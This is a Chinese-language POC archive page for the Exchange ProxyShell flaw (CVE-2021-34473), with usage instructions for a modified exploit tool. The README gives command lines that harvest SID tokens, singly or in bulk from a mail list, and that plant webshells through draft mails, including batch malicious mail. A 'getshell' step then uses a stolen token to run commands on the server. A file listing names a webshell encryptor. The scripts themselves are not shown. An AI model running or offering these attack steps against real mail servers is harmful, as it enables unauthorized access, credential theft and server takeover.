关联漏洞
标题:Microsoft Exchange Server 代码问题漏洞 (CVE-2021-34473)Description:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server存在代码问题漏洞。以下产品和版本受到影响:Microsoft Exchange Server 2013 Cumulative Update 23,Microsoft Exchange Server 2019 Cumulative Update 9,Microsoft Exchange Se
Description
对Exchange Proxyshell 做了二次修改,精确的拆分、实现辅助性安全测试。
介绍
- python send_webshell_mail.py https://mail16.echod.com aaa@echod.com 单个获取
- python send_webshell_mail.py https://mail16.echod.com crack 批量从mail.txt 读取邮件,进行尝试获取SID token
- python send_webshell_mail.py https://mail16.echod.com aaa@echod.com send (只发送webshell 草稿邮件)
- python send_webshell_mail.py https://mail16.echod.com crack send 批量发恶意邮件 (不建议这么做)
- python wsman_shell.py https://mail.echod.com Administrator@echod.com [这里替换获取到的token] 这里只进入cmdlet 执行命令
###### 发送邮件后可以直接使用 这个命令即可尝试getshell,具体Path可在脚本路径里调
- python wsman_shell.py https://mail.echod.com Administrator@echod.com [这里替换获取到的token] shell
##### Test Send mail

##### Test shell Response eeeee

##### Crypt_webshell

文件快照
[4.0K] /data/pocs/a16a4801be9b26a71fe94c7f65d58ed53c65e31e
├── [ 63K] Crypt_shellcontent.png
├── [4.0K] Crypt_webshell
│ ├── [ 91] conver_baser64.py
│ ├── [ 10K] Exchange_Cryptshell.exe
│ ├── [ 157] readme.txt
│ └── [ 123] shell.txt
├── [401K] getshell.png
├── [ 40] mail.txt
├── [1.2K] README.md
├── [ 75K] send_mail.png
├── [6.6K] send_webshell_mail.py
├── [1.2K] sid.py
└── [5.6K] wsman_shell.py
1 directory, 12 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。